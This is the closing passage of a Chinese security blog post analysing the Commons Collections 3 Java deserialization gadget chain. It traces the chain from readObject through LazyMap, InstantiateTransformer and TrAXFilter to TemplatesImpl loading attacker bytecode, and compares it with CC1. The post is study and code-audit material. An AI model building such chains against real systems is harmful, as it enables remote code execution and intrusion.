<span class="line"><span style="color: #E06C75">    </span><span style="color: #C678DD">public</span><span style="color: #61AFEF"> </span><span style="color: #C678DD">void</span><span style="color: #61AFEF"> transform</span><span style="color: #ABB2BF">(...)</span><span style="color: #61AFEF"> </span><span style="color: #ABB2BF">{}</span></span>
<span class="line"><span style="color: #E06C75">    </span><span style="color: #C678DD">public</span><span style="color: #61AFEF"> </span><span style="color: #C678DD">void</span><span style="color: #61AFEF"> transform</span><span style="color: #ABB2BF">(...)</span><span style="color: #61AFEF"> </span><span style="color: #ABB2BF">{}</span></span>
<span class="line"><span style="color: #ABB2BF">}</span></span></code></pre>
<p>因为 <code>TemplatesImpl</code> 在加载 <code>_bytecodes</code> 之后，需要识别主 translet 类。继承 <code>AbstractTranslet</code> 是为了满足这个结构要求。</p>
<p>OpenJDK 中，<code>TemplatesImpl.newTransformer()</code> 会进入：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #E06C75">transformer </span><span style="color: #56B6C2">=</span><span style="color: #E06C75"> </span><span style="color: #C678DD">new</span><span style="color: #E06C75"> </span><span style="color: #61AFEF">TransformerImpl</span><span style="color: #E06C75">(</span><span style="color: #61AFEF">getTransletInstance</span><span style="color: #E06C75">()</span><span style="color: #ABB2BF">,</span><span style="color: #E06C75"> _outputProperties</span><span style="color: #ABB2BF">,</span><span style="color: #E06C75"> _indentNumber</span><span style="color: #ABB2BF">,</span><span style="color: #E06C75"> _tfactory)</span><span style="color: #ABB2BF">;</span></span></code></pre>
<p><code>getTransletInstance()</code> 继续触发：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #C678DD">if</span><span style="color: #E06C75"> (_name </span><span style="color: #56B6C2">==</span><span style="color: #E06C75"> </span><span style="color: #D19A66">null</span><span style="color: #E06C75">) </span><span style="color: #C678DD">return</span><span style="color: #E06C75"> </span><span style="color: #D19A66">null</span><span style="color: #ABB2BF">;</span></span>
<span class="line"><span style="color: #C678DD">if</span><span style="color: #E06C75"> (_class </span><span style="color: #56B6C2">==</span><span style="color: #E06C75"> </span><span style="color: #D19A66">null</span><span style="color: #E06C75">) </span><span style="color: #61AFEF">defineTransletClasses</span><span style="color: #E06C75">()</span><span style="color: #ABB2BF">;</span></span>
<span class="line"><span style="color: #E5C07B">AbstractTranslet</span><span style="color: #E06C75"> translet </span><span style="color: #56B6C2">=</span><span style="color: #E06C75"> (AbstractTranslet) </span><span style="color: #E5C07B">_class</span><span style="color: #E06C75">[_transletIndex]</span><span style="color: #ABB2BF">.</span><span style="color: #61AFEF">newInstance</span><span style="color: #ABB2BF">();</span></span>
<span class="line"><span style="color: #E5C07B">translet</span><span style="color: #ABB2BF">.</span><span style="color: #61AFEF">setTemplates</span><span style="color: #ABB2BF">(</span><span style="color: #E5C07B">this</span><span style="color: #ABB2BF">);</span></span></code></pre>
<p><code>defineTransletClasses()</code> 的关键语句：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #E5C07B">_class</span><span style="color: #E06C75">[i] </span><span style="color: #56B6C2">=</span><span style="color: #E06C75"> </span><span style="color: #E5C07B">loader</span><span style="color: #ABB2BF">.</span><span style="color: #61AFEF">defineClass</span><span style="color: #ABB2BF">(</span><span style="color: #E5C07B">_bytecodes</span><span style="color: #ABB2BF">[i]);</span></span></code></pre>
<p>出处：<a href="https://github.com/openjdk/jdk8u/blob/master/jaxp/src/com/sun/org/apache/xalan/internal/xsltc/trax/TemplatesImpl.java#L390-L486">TemplatesImpl.java</a></p>
<p>这段调用压缩后是：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">TemplatesImpl.newTransformer()</span></span>
<span class="line"><span style="color: #abb2bf"> -> getTransletInstance()</span></span>
<span class="line"><span style="color: #abb2bf"> -> defineTransletClasses()</span></span>
<span class="line"><span style="color: #abb2bf"> -> ClassLoader#defineClass(_bytecodes)</span></span>
<span class="line"><span style="color: #abb2bf"> -> newInstance()</span></span></code></pre>
<p><code>defineClass</code> 负责把 <code>byte[]</code> 定义成 <code>Class</code>。后面的 <code>newInstance()</code> 会触发类初始化，因此 payload 中的 <code>static {}</code> 会执行。</p>
<hr>
<h2 id="6-cc3-由此重新成立">6. CC3 由此重新成立</h2>
<p>把前面的入口、触发过程、执行手段、最终落点接起来，CC3 完整链路就是：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">readObject()</span></span>
<span class="line"><span style="color: #abb2bf"> -> AnnotationInvocationHandler</span></span>
<span class="line"><span style="color: #abb2bf"> -> proxyMap.entrySet()</span></span>
<span class="line"><span style="color: #abb2bf"> -> LazyMap.get("entrySet")</span></span>
<span class="line"><span style="color: #abb2bf"> -> ChainedTransformer</span></span>
<span class="line"><span style="color: #abb2bf"> -> ConstantTransformer(TrAXFilter.class)</span></span>
<span class="line"><span style="color: #abb2bf"> -> InstantiateTransformer(Templates.class, templatesInstance)</span></span>
<span class="line"><span style="color: #abb2bf"> -> new TrAXFilter(templatesInstance)</span></span>
<span class="line"><span style="color: #abb2bf"> -> templatesInstance.newTransformer()</span></span>
<span class="line"><span style="color: #abb2bf"> -> TemplatesImpl.defineTransletClasses()</span></span>
<span class="line"><span style="color: #abb2bf"> -> ClassLoader#defineClass(...)</span></span>
<span class="line"><span style="color: #abb2bf"> -> translet 类初始化 / 实例化</span></span></code></pre>
<p>CC1 和 CC3 的后半段，对比起来就是：</p>
<pre is:raw="" class="astro-code one-dark-pro" style="background-color: #282c34; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0"><code><span class="line"><span style="color: #abb2bf">CC1:</span></span>
<span class="line"><span style="color: #abb2bf">InvokerTransformer</span></span>
<span class="line"><span style="color: #abb2bf"> -> Runtime.exec()</span></span>
<span class="line"><span style="color: #abb2bf"></span></span>
<span class="line"><span style="color: #abb2bf">CC3:</span></span>
<span class="line"><span style="color: #abb2bf">InstantiateTransformer</span></span>
<span class="line"><span style="color: #abb2bf"> -> TrAXFilter(templatesInstance)</span></span>
<span class="line"><span style="color: #abb2bf"> -> TemplatesImpl.newTransformer()</span></span>
<span class="line"><span style="color: #abb2bf"> -> ClassLoader#defineClass(_bytecodes)</span></span></code></pre>
<blockquote>
<p>CC3 保留 CC1 的入口和触发过程，把执行手段从 <code>InvokerTransformer</code> 换成 <code>InstantiateTransformer + TrAXFilter</code>，把最终落点切到 <code>TemplatesImpl#defineClass</code>。</p>
</blockquote>
      </article>

      <ul class="tags-container astro-VJ4TPSPI">
        <li class="inline-block my-1 underline-offset-4 astro-BLWJYJPT">
  <a href="/tags/java" class="text-sm pr-2 group astro-BLWJYJPT">
    <svg xmlns="http://www.w3.org/2000/svg" class=" scale-75 astro-BLWJYJPT"><path d="M16.018 3.815 15.232 8h-4.966l.716-3.815-1.964-.37L8.232 8H4v2h3.857l-.751 4H3v2h3.731l-.714 3.805 1.965.369L8.766 16h4.966l-.714 3.805 1.965.369.783-4.174H20v-2h-3.859l.751-4H21V8h-3.733l.716-3.815-1.965-.37zM14.106 14H9.141l.751-4h4.966l-.752 4z" class="astro-BLWJYJPT"></path>
    </svg>
    &nbsp;<span class="astro-BLWJYJPT">java</span>
  </a>
</li><li class="inline-block my-1 underline-offset-4 astro-BLWJYJPT">
  <a href="/tags/代码审计" class="text-sm pr-2 group astro-BLWJYJPT">
    <svg xmlns="http://www.w3.org/2000/svg" class=" scale-75 astro-BLWJYJPT"><path d="M16.018 3.815 15.232 8h-4.966l.716-3.815-1.964-.37L8.232 8H4v2h3.857l-.751 4H3v2h3.731l-.714 3.805 1.965.369L8.766 16h4.966l-.714 3.805 1.965.369.783-4.174H20v-2h-3.859l.751-4H21V8h-3.733l.716-3.815-1.965-.37zM14.106 14H9.141l.751-4h4.966l-.752 4z" class="astro-BLWJYJPT"></path>
    </svg>
    &nbsp;<span class="astro-BLWJYJPT">代码审计</span>
  </a>
</li><li class="inline-block my-1 underline-offset-4 astro-BLWJYJPT">
  <a href="/tags/反序列化" class="text-sm pr-2 group astro-BLWJYJPT">
    <svg xmlns="http://www.w3.org/2000/svg" class=" scale-75 astro-BLWJYJPT"><path d="M16.018 3.815 15.232 8h-4.966l.716-3.815-1.964-.37L8.232 8H4v2h3.857l-.751 4H3v2h3.731l-.714 3.805 1.965.369L8.766 16h4.966l-.714 3.805 1.965.369.783-4.174H20v-2h-3.859l.751-4H21V8h-3.733l.716-3.815-1.965-.37zM14.106 14H9.141l.751-4h4.966l-.752 4z" class="astro-BLWJYJPT"></path>
    </svg>
    &nbsp;<span class="astro-BLWJYJPT">反序列化</span>
  </a>
</li><li class="inline-block my-1 underline-offset-4 astro-BLWJYJPT">
  <a href="/tags/commons collections" class="text-sm pr-2 group astro-BLWJYJPT">
    <svg xmlns="http://www.w3.org/2000/svg" class=" scale-75 astro-BLWJYJPT"><path d="M16.018 3.815 15.232 8h-4.966l.716-3.815-1.964-.37L8.232 8H4v2h3.857l-.751 4H3v2h3.731l-.714 3.805 1.965.369L8.766 16h4.966l-.714 3.805 1.965.369.783-4.174H20v-2h-3.859l.751-4H21V8h-3.733l.716-3.815-1.965-.37zM14.106 14H9.141l.751-4h4.966l-.752 4z" class="astro-BLWJYJPT"></path>
    </svg>
    &nbsp;<span class="astro-BLWJYJPT">commons collections</span>
  </a>
</li>
      </ul>

      <div class="mx-auto mt-8 max-w-3xl text-sm opacity-70 astro-VJ4TPSPI">
        <span id="view-count" class="view-count-loading astro-VJ4TPSPI">阅读统计中...</span>
        <span id="busuanzi_container_page_pv" style="display:none" class="astro-VJ4TPSPI">
          阅读 <span id="busuanzi_value_page_pv" class="astro-VJ4TPSPI"></span>
        </span>
      </div>

      <div class="giscus-wrapper mx-auto max-w-3xl mt-12 astro-VJ4TPSPI">
        <script src="https://giscus.app/client.js" data-repo="shanz0ng/shanz0ng.github.io" data-repo-id="R_kgDOTQguag" data-category="General" data-category-id="DIC_kwDOTQguas4DBJc4" data-mapping="pathname" data-strict="0" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="bottom" data-theme="light" data-lang="zh-CN" crossorigin="anonymous" async>
        </script>
      </div>
    </main>

    <aside id="toc-sidebar" class="toc-sidebar astro-VJ4TPSPI">
      <div class="toc-header astro-VJ4TPSPI">
        <span class="toc-title astro-VJ4TPSPI">目录</span>
        <button id="toc-close" class="toc-close astro-VJ4TPSPI" title="隐藏目录">
          <svg width="16" height="16" viewBox="0 0 16 16" fill="currentColor" class="astro-VJ4TPSPI">
            <path fill-rule="evenodd" d="M11.854 4.146a.5.5 0 0 1 0 .708L8.707 8l3.147 3.146a.5.5 0 0 1-.708.708L8 8.707l-3.146 3.147a.5.5 0 0 1-.708-.708L7.293 8 4.146 4.854a.5.5 0 1 1 .708-.708L8 7.293l3.146-3.147a.5.5 0 0 1 .708 0z" class="astro-VJ4TPSPI"></path>
          </svg>
        </button>
      </div>
      <div class="toc-progress astro-VJ4TPSPI">
        <div class="toc-progress-meta astro-VJ4TPSPI">
          <span class="toc-progress-label astro-VJ4TPSPI">已读</span>
          <span id="toc-progress-value" class="toc-progress-value astro-VJ4TPSPI">0%</span>
        </div>
        <div class="toc-progress-track astro-VJ4TPSPI" aria-hidden="true">
          <div id="toc-progress-bar" class="toc-progress-bar astro-VJ4TPSPI"></div>
        </div>
      </div>
      <div class="toc-sticky astro-VJ4TPSPI">
        <nav id="toc-nav" class="astro-VJ4TPSPI">
          <ol id="toc-list" class="toc-list astro-VJ4TPSPI"></ol>
        </nav>
      </div>
    </aside>
    <button id="toc-tab" class="toc-tab hidden astro-VJ4TPSPI" title="显示目录">
      <svg width="16" height="16" viewBox="0 0 16 16" fill="currentColor" class="astro-VJ4TPSPI">
        <path fill-rule="evenodd" d="M2.5 12a.5.5 0 0 1 .5-.5h10a.5.5 0 0 1 0 1H3a.5.5 0 0 1-.5-.5zm0-4a.5.5 0 0 1 .5-.5h10a.5.5 0 0 1 0 1H3a.5.5 0 0 1-.5-.5zm0-4a.5.5 0 0 1 .5-.5h10a.5.5 0 0 1 0 1H3a.5.5 0 0 1-.5-.5z" class="astro-VJ4TPSPI"></path>
      </svg>
      <span class="toc-tab-label astro-VJ4TPSPI">目录</span>
    </button>
  </div>
  <footer class="mt-auto astro-SZ7XMLTE">
  <div class="max-w-3xl mx-auto px-0">
  <hr class="border-skin-line" aria-hidden="true">
</div>
  <div class="footer-wrapper astro-SZ7XMLTE">
    <div class="social-icons flex astro-UPU6FZXR">
  <a type="button" href="https://github.com/shanz0ng" tabindex="0" class="group link-button astro-UPU6FZXR astro-5EUNQZKT" title="山宗的blog on Github">
  
        <svg
    xmlns="http://www.w3.org/2000/svg"
    class="icon-tabler"
    stroke-linecap="round"
    stroke-linejoin="round"
  >
    <path stroke="none" d="M0 0h24v24H0z" fill="none"></path>
    <path
      d="M9 19c-4.3 1.4 -4.3 -2.5 -6 -3m12 5v-3.5c0 -1 .1 -1.4 -.5 -2c2.8 -.3 5.5 -1.4 5.5 -6a4.6 4.6 0 0 0 -1.3 -3.2a4.2 4.2 0 0 0 -.1 -3.2s-1.1 -.3 -3.5 1.3a12.3 12.3 0 0 0 -6.2 0c-2.4 -1.6 -3.5 -1.3 -3.5 -1.3a4.2 4.2 0 0 0 -.1 3.2a4.6 4.6 0 0 0 -1.3 3.2c0 4.6 2.7 5.7 5.5 6c-.6 .6 -.6 1.2 -.5 2v3.5"
    ></path>
  </svg>
      
</a>
</div>
    <div class="copyright-wrapper astro-SZ7XMLTE">
      <span class="astro-SZ7XMLTE">Copyright &#169; 2026</span>
      <span class="separator astro-SZ7XMLTE">&nbsp;|&nbsp;</span>
      <span class="astro-SZ7XMLTE">All rights reserved.</span>
    </div>
  </div>
</footer>

  </body></html>





<script src="//cdn.jsdelivr.net/npm/busuanzi@2.3.0/bsz.pure.mini.js" async></script>